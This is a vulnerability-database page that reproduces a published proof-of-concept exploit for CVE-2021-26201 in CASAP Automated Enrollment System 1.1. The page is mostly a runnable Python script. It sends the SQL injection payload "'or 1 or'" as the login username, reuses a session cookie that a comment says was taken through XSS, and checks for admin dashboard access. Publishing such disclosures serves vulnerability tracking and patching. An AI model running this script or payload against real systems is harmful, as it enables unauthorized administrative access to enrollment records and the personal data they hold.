Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

CASAP Automated Enrollment System 1.1 SQL Injection

Related Vulnerabilities: CVE-2021-26201   cve-2021-26201  
Publish Date: 02 Mar 2021
Author: nu11secur1ty
Source 
                # Exploit Title: CASAP Automated Enrollment System 1.1 -
Authentication Bypass cookie session
# Exploit Author: @nu11secur1ty
# Date: 03.02.2021
# Vendor Homepage:
https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.1
# Tested On: Ubuntu + XAMPP 7.3.2
# Description: CASAP Automated Enrollment System 1.0 - Authentication
Bypass SQLi cookie session
# Exploit Link:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26201
# More: https://www.nu11secur1ty.com/2021/03/cve-2021-26201.html

[Exploit]


import time
import sys
import requests
import webbrowser

# Creator of the idea: Himanshu Shukla
print("Author: @nu11secur1ty")

def authbypass(url):

  #Authentication Bypass
  s = requests.Session()
  #Set Cookie fot testing
  #PHPSESSID=3g6ghfl8i7qh190m4pq92fv262 #in my case from XSS attack
  cookies = {'PHPSESSID': 'inucrnag25j9h5hb826kovir0p'}

  print ("[*]Attempting Authentication Bypass cookie session...")
  time.sleep(1)

  values = {"username":"'or 1 or'","password":""}
  r=s.post(url+'login.php', data=values, cookies=cookies)
  p=s.get(url+'dashboard.php', cookies=cookies)

  #Check if Authentication was bypassed or not.
  logged_in = True if ("true_admin" in r.text) else False
  l=logged_in
  if l:
    print("[+]Authentication Bypass Successful...!")
  else:
    print("[-]Failed cookie Authentication exploit!")
    print("[-]Check Your URL")

if __name__ == "__main__":
  
  if len(sys.argv)!=2:
    print("You Haven't Provided any URL!")
    print("Usage : python3 exploit.py <URL>")
    print("Example : python3 exploit.py http://IP_or_domain/final/")
    exit()
  try:
    authbypass(sys.argv[1])
    webbrowser.open('http://10.10.10.100/final/dashboard.php')
  except:

    print("[-]Invalid URL!")
    exit()

# BR @nu11secur1ty


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started